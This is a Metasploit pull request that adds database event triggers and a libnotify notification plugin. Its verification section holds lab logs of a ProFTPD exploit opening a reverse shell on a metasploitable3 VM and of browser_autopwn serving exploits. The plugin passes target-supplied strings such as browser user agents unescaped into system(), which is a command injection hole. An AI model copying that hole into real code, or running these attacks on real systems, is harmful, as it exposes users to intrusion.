### PR TITLE
Trigger database events

### DIFF
--- a/lib/msf/core/db_manager/client.rb
+++ b/lib/msf/core/db_manager/client.rb
@@ -57,6 +57,14 @@ module Msf::DBManager::Client
         dlog("Unknown attribute for Client: #{k}")
       end
     end
+
+    begin
+      framework.events.on_db_client(client) if client.new_record?
+    rescue ::Exception => e
+      wlog("Exception in on_db_client event handler: #{e.class}: #{e}")
+      wlog("Call Stack\n#{e.backtrace.join("\n")}")
+    end
+
     if client && client.changed?
       client.save!
     end

--- a/lib/msf/core/db_manager/ref.rb
+++ b/lib/msf/core/db_manager/ref.rb
@@ -9,6 +9,14 @@ module Msf::DBManager::Ref
 
   ::ActiveRecord::Base.connection_pool.with_connection {
     ref = ::Mdm::Ref.where(name: opts[:name]).first_or_initialize
+
+    begin
+      framework.events.on_db_ref(ref) if ref
+    rescue ::Exception => e
+      wlog("Exception in on_db_ref event handler: #{e.class}: #{e}")
+      wlog("Call Stack\n#{e.backtrace.join("\n")}")
+    end
+
     if ref and ref.changed?
       ref.save!
     end

--- a/lib/msf/core/db_manager/service.rb
+++ b/lib/msf/core/db_manager/service.rb
@@ -89,6 +89,7 @@ module Msf::DBManager::Service
     proto = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO
 
     service = host.services.where(port: opts[:port].to_i, proto: proto).first_or_initialize
+    ostate = service.state
     opts.each { |k,v|
       if (service.attribute_names.include?(k.to_s))
         service[k] = ((v and k == :name) ? v.to_s.downcase : v)
@@ -106,15 +107,16 @@ module Msf::DBManager::Service
       wlog("Call Stack\n#{e.backtrace.join("\n")}")
     end
 
+    begin
+      framework.events.on_db_service_state(service, service.port, ostate) if service.state != ostate
+    rescue ::Exception => e
+      wlog("Exception in on_db_service_state event handler: #{e.class}: #{e}")
+      wlog("Call Stack\n#{e.backtrace.join("\n")}")
+    end
+
     if (service and service.changed?)
       msf_import_timestamps(opts,service)
       service.save!
-      begin
-        framework.events.on_db_service_state(service)
-      rescue ::Exception => e
-        wlog("Exception in on_db_service_state event handler: #{e.class}: #{e}")
-        wlog("Call Stack\n#{e.backtrace.join("\n")}")
-      end
     end
 
     if opts[:task]

--- a/lib/msf/core/db_manager/service.rb
+++ b/lib/msf/core/db_manager/service.rb
@@ -99,9 +99,22 @@ module Msf::DBManager::Service
     service.state ||= Msf::ServiceState::Open
     service.info  ||= ""
 
+    begin
+      framework.events.on_db_service(service) if service.new_record?
+    rescue ::Exception => e
+      wlog("Exception in on_db_service event handler: #{e.class}: #{e}")
+      wlog("Call Stack\n#{e.backtrace.join("\n")}")
+    end
+
     if (service and service.changed?)
       msf_import_timestamps(opts,service)
       service.save!
+      begin
+        framework.events.on_db_service_state(service)
+      rescue ::Exception => e
+        wlog("Exception in on_db_service_state event handler: #{e.class}: #{e}")
+        wlog("Call Stack\n#{e.backtrace.join("\n")}")
+      end
     end
 
     if opts[:task]

--- a/lib/msf/core/db_manager/vuln.rb
+++ b/lib/msf/core/db_manager/vuln.rb
@@ -198,6 +198,14 @@ module Msf::DBManager::Vuln
 
         vinf[:service_id] = service.id if service
         vuln = Mdm::Vuln.create(vinf)
+
+        begin
+          framework.events.on_db_vuln(vuln) if vuln
+        rescue ::Exception => e
+          wlog("Exception in on_db_vuln event handler: #{e.class}: #{e}")
+          wlog("Call Stack\n#{e.backtrace.join("\n")}")
+        end
+
       end
     end
 

--- a/plugins/libnotify.rb
+++ b/plugins/libnotify.rb
@@ -1,0 +1,91 @@
+###
+#
+# This plugin hooks all session creation and db events
+# and send desktop notifications using notify-send command.
+#
+###
+
+module Msf
+
+class Plugin::EventLibnotify < Msf::Plugin
+  include Msf::SessionEvent
+  include Msf::DatabaseEvent
+
+  def initialize(framework, opts)
+    super
+
+    @bin = opts[:bin] || opts['bin'] || `which notify-send`.chomp
+    @bin_opts = opts[:opts] || opts['opts'] || '-a Metasploit'
+
+    raise 'libnotify not found' if @bin.empty?
+
+    self.framework.events.add_session_subscriber(self)
+    self.framework.events.add_db_subscriber(self)
+  end
+
+  def notify_send(urgency, title, message)
+    system("#{@bin} #{@bin_opts} -u #{urgency} '#{title}' '#{message}'")
+  end
+
+  def on_session_open(session)
+    notify_send('normal', 'Got Shell!',
+                "New Session: #{session.sid}\nIP: #{session.session_host}\nPeer: #{session.tunnel_peer}\n"\
+                "Platform: #{session.platform}\nType: #{session.type}")
+  end
+
+  def on_session_close(session, reason='')
+    notify_send('normal', 'Connection closed',
+                "Session:#{session.sid} Type:#{session.type} closed.\n#{reason}")
+  end
+
+  def on_session_fail(reason='')
+    notify_send('critical', 'Session Failure!', reason)
+  end
+
+  def on_db_host(host)
+    notify_send('normal', 'New host',
+                "Addess: #{host.address}\nOS: #{host.os_name}")
+  end
+
+  def on_db_host_state(host, ostate)
+    notify_send('normal', "Host #{host.address} changed",
+                "OS: #{host.os_name}\nNb Services: #{host.service_count}\nNb vulns: #{host.vuln_count}\n")
+  end
+
+  def on_db_service(service)
+    notify_send('normal', 'New service',
+                "New service: #{service.host.address}:#{service.port}")
+  end
+
+  def on_db_service_state(service, port, ostate)
+    notify_send('normal', "Service #{service.host.address}:#{service.port} changed",
+                "Name: #{service.name}\nState: #{service.state}\nProto: #{service.proto}\nInfo: #{service.info}")
+  end
+
+  def on_db_vuln(vuln)
+    notify_send('critical', "New vulnerability on #{vuln.host.address}:#{vuln.service ? vuln.service.port : '0'}",
+                "Vuln: #{vuln.name}\nInfos: #{vuln.info}")
+  end
+
+  def on_db_ref(ref)
+    notify_send('normal', 'New ref', "Reference #{ref.name} added in database.")
+  end
+
+  def on_db_client(client)
+    notify_send('critical', 'New client', "New client connected: #{client.ua_string}")
+  end
+
+  def cleanup
+    self.framework.events.remove_session_subscriber(self)
+    self.framework.events.remove_db_subscriber(self)
+  end
+
+  def name
+    'libnotify'
+  end
+
+  def desc
+    'Send desktop notification with libnotify on sessions & db events'
+  end
+end
+end


### PR DESCRIPTION
Implemented plugins handlers defined in [lib/msf/core/database_event.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/database_event.rb):
- on_db_client
- on_db_host
- on_db_service
- on_db_vuln
- on_db_host_state
- on_db_ref
- on_db_service_state

This allow us to write plugins that handle db events.

## Verification

Here is an example plugin `test_dbevents.rb` to perform tests:
```
module Msf

class Plugin::TestDbEvents < Msf::Plugin
  include Msf::DatabaseEvent

  def initialize(framework, opts)
    super
    if (not framework.db.active)
      raise PluginLoadError.new("The database backend has not been initialized")
    end

    self.framework.events.add_db_subscriber(self)
  end

  def on_db_host(host)
    print_status("New host: #{host}")
  end
  def on_db_host_state(host, ostate)
    print_status("Host change: #{host}, ostate: #{ostate}")
  end
  def on_db_service(service)
    print_status("New service: #{service}")
  end
  def on_db_service_state(service, port, ostate)
    print_status("Service change: #{service}, port: #{port}, ostate: #{ostate}")
  end
  def on_db_vuln(vuln)
    print_status("New vuln: #{vuln}")
  end
  def on_db_ref(ref)
    print_status("New ref: #{ref}")
  end
  def on_db_client(client)
    print_status("New client: #{client}")
  end

  def cleanup
    self.framework.events.remove_db_subscriber(self)
  end
  def name
    'test_dbevents'
  end
  def desc
    'Test plugin for db events'
  end
end
end
```

Steps:

- [ ] Copy the test plugin in `~/.msf4/plugins/test_dbevents.rb`
- [ ] Start `msfconsole`
- [ ] Load `test_dbevents` plugin: `load test_dbevents`
- [ ] Perform following tasks to trigger events
  - [ ] Add new host and service
  - [ ] New service
  - [ ] Host change
  - [ ] Service change
  - [ ] New vuln and refs
  - [ ] New client

## Triggering events

The target machine `172.28.128.3` is a metasploitable3 trusty.

### Add new host and service
```
msf > db_nmap -p 22 172.28.128.3
[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-11-28 19:53 CET
[*] Nmap: Nmap scan report for 172.28.128.3
[*] Nmap: Host is up (0.00026s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 22/tcp open  ssh
[*] Nmap: MAC Address: 08:00:27:4B:64:CE (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
[*] New host: #<Mdm::Host:0x0055b37d335230>
[*] Host change: #<Mdm::Host:0x0055b37d335230>
[*] New service: #<Mdm::Service:0x0055b37d523f10>
[*] Service change: #<Mdm::Service:0x0055b37d523f10>
```

### New service
```
msf > db_nmap -p 80 172.28.128.3
[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-11-28 19:53 CET
[*] Nmap: Nmap scan report for 172.28.128.3
[*] Nmap: Host is up (0.00036s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 80/tcp open  http
[*] Nmap: MAC Address: 08:00:27:4B:64:CE (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
[*] Host change: #<Mdm::Host:0x0055b3827d8120>
[*] New service: #<Mdm::Service:0x0055b3828f7ad8>
[*] Service change: #<Mdm::Service:0x0055b3828f7ad8>
```

### Host change
```
msf > db_nmap -p 80 -O 172.28.128.3
[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-11-28 19:53 CET
[*] Nmap: Nmap scan report for 172.28.128.3
[*] Nmap: Host is up (0.00048s latency).
[*] Nmap: PORT   STATE SERVICE
[*] Nmap: 80/tcp open  http
[*] Nmap: MAC Address: 08:00:27:4B:64:CE (Oracle VirtualBox virtual NIC)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 3.X|4.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
[*] Nmap: OS details: Linux 3.2 - 4.8
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.48 seconds
[*] Host change: #<Mdm::Host:0x0055b3834513c0>
```

### Service change
```
msf > db_nmap -p 80 -A 172.28.128.3
[*] Nmap: Starting Nmap 7.50 ( https://nmap.org ) at 2017-11-28 19:54 CET
[*] Nmap: Nmap scan report for 172.28.128.3
[*] Nmap: Host is up (0.00047s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.7 (Ubuntu)
[*] Nmap: |_http-title: Apache2 Ubuntu Default Page: It works
[*] Nmap: MAC Address: 08:00:27:4B:64:CE (Oracle VirtualBox virtual NIC)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 3.X|4.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
[*] Nmap: OS details: Linux 3.2 - 4.8
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.47 ms 172.28.128.3
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.18 seconds
[*] Host change: #<Mdm::Host:0x0055b38438a4e0>
[*] Service change: #<Mdm::Service:0x0055b38442c358>
```

### New vuln and refs
```
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf exploit(proftpd_modcopy_exec) > set RHOST 172.28.128.3
RHOST => 172.28.128.3
msf exploit(proftpd_modcopy_exec) > exploit -z

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] 172.28.128.3:80 - 172.28.128.3:21 - Connected to FTP server
[*] 172.28.128.3:80 - 172.28.128.3:21 - Sending copy commands to FTP server
[*] 172.28.128.3:80 - Executing PHP payload /TDzX20.php
[*] Host change: #<Mdm::Host:0x0055b38470dce8>
[*] New ref: #<Mdm::Ref:0x0055b3844cda78>
[*] New ref: #<Mdm::Ref:0x0055b384444bb0>
[*] New vuln: #<Mdm::Vuln:0x0055b3843bc760>
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:51336) at 2017-11-28 19:54:59 +0100
[*] Session 1 created in the background.
```

### New client
```
msf exploit(proftpd_modcopy_exec) > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 172.28.128.1
LHOST => 172.28.128.1
msf auxiliary(browser_autopwn) > run -j
[*] Auxiliary module running as background job 0.

[*] Setup
[*] Starting exploit modules on host 172.28.128.1...
[*] ---

[...] Loading modules.... [...]

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/BWN0WIO2peyhwr
[*] Local IP: http://172.28.128.1:8080/BWN0WIO2peyhwr
[*] Server started.
msf auxiliary(browser_autopwn) >
[*] Handling '/BWN0WIO2peyhwr'
[*] Handling '/BWN0WIO2peyhwr?sessid=TGludXg6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOmVuLVVTOng4Nl82NDpGaXJlZm94OjUxLjA6'
[*] JavaScript Report: Linux:undefined:undefined:undefined:undefined:en-US:x86_64:Firefox:51.0:
[*] Reporting: {"os.product"=>"Linux", "os.language"=>"en-US", "os.arch"=>"x86_64", "os.certainty"=>"0.7"}
[*] New host: #<Mdm::Host:0x0055b37d853410>
[*] Host change: #<Mdm::Host:0x0055b37d853410>
[*] New client: #<Mdm::Client:0x0055b37d486e90>
[*] Responding with 9 exploits
msf auxiliary(browser_autopwn) >
```